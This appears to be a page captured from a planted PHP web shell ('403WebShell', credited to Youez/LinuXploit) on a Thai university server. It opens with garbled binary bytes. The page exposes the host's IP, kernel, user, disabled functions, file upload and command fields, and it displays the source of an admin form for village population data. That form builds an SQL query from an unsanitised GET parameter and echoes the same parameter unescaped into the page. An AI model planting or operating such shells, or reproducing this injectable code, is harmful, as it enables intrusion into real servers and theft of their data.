h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/trr/sample/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/trr/sample/lifestyle_population_add.php
<?php include 'check_mode_admin.php';?>
<?php include 'admin_dbconnect.php';?>
<?php include 'header.php';?>
<?php
	$lifestyle_ethieGroup_id=$_GET['lifestyle_ethieGroup_id'];
	$strSQL = "SELECT * FROM lifestyle where lifestyle_ethieGroup_id=" . $lifestyle_ethieGroup_id ;
	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");	
	if($objResult = mysql_fetch_array($objQuery))
	{
?>
            <div class="row">
                <div class="col-lg-12">
                    <h1 class="page-header">เพิ่มข้อมูลประชากร</h1>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
            <div class="row">
                <div class="col-lg-12">
					<!--<form name="form1" method="post" action="person_add_db.php">-->
					<form action="lifestyle_population_add_db.php" method="post" enctype="multipart/form-data" name="form1" id="form1" accept-charset="UTF-8">
                                        <div class="form-group">
                                            <label>จังหวัด</label>
                                            <input name="ref_lifestyletype_pop_province" class="form-control" id="ref_lifestyletype_pop_province" size="100" maxlength="100">
                                        </div>	
										<div class="form-group">
                                            <label>อำเภอ</label>
                                            <input name="ref_lifestyletype_pop_district" class="form-control" id="ref_lifestyletype_pop_district" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>ตำบล</label>
                                            <input name="ref_lifestyletype_pop_subDistrict" class="form-control" id="ref_lifestyletype_pop_subDistrict" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>หมู่บ้าน</label>
                                            <input name="ref_lifestyletype_pop_village" class="form-control" id="ref_lifestyletype_pop_village" size="30" maxlength="30">
                                        </div>	
										<div class="form-group">
                                            <label>จำนวนครัวเรือน</label>
                                            <input name="ref_lifestyletype_pop_householdNum" class="form-control" id="ref_lifestyletype_pop_householdNum" size="4" maxlength="4">
                                        </div>	
										<div class="form-group">
                                            <label>จำนวนประชากร</label>
                                            <input name="ref_lifestyletype_pop_num" class="form-control" id="ref_lifestyletype_pop_num" size="4" maxlength="4">
                                        </div>	
										<div class="form-group">
                                            <label>ได้สัญชาติ</label>
                                            <input name="ref_lifestyletype_pop_nationallity" class="form-control" id="ref_lifestyletype_pop_nationallity" size="20" maxlength="20">
                                        </div>	
										<div class="form-group">
                                            <label>ไม่ได้สัญชาติ</label>
                                            <input name="ref_lifestyletype_pop_Notnationallity" class="form-control" id="ref_lifestyletype_pop_Notnationallity" size="20" maxlength="20">
                                        </div>	
										<div class="form-group">
                                            <label>ละติจูด	</label>
                                            <input name="latitude" class="form-control" id="latitude" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>ลองจิจูด</label>
                                            <input name="longitude" class="form-control" id="longitude" size="50" maxlength="50">
                                        </div>					
										<div class="form-group">
                                            <label>ลิงค์</label>
                                            <input name="ref_lifestyletype_pop_link" class="form-control" id="ref_lifestyletype_pop_link" size="30" maxlength="30">
                                        </div>	                                        
										<div class="form-group">
											<input name="submit" type="submit" id="submit" value="บันทึกข้อมูล" class="btn btn-success">
											&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
											<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">ยกเลิกการเพิ่ม</button></a>
											<input name="lifestyle_ethieGroup_id" type="hidden" id="lifestyle_ethieGroup_id" value="<?php echo $lifestyle_ethieGroup_id;?>" />
                                        </div>	
					</form>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
<?php
	}
	else //if($objResult = mysql_fetch_array($objQuery))
	{
		echo "<h4>ไม่พบข้อมูลนี้</h4>";
?>		
		<BR><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">กลับหน้าที่แล้ว</button></a>
<?php
	}
?>

<?php include 'sidebar.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit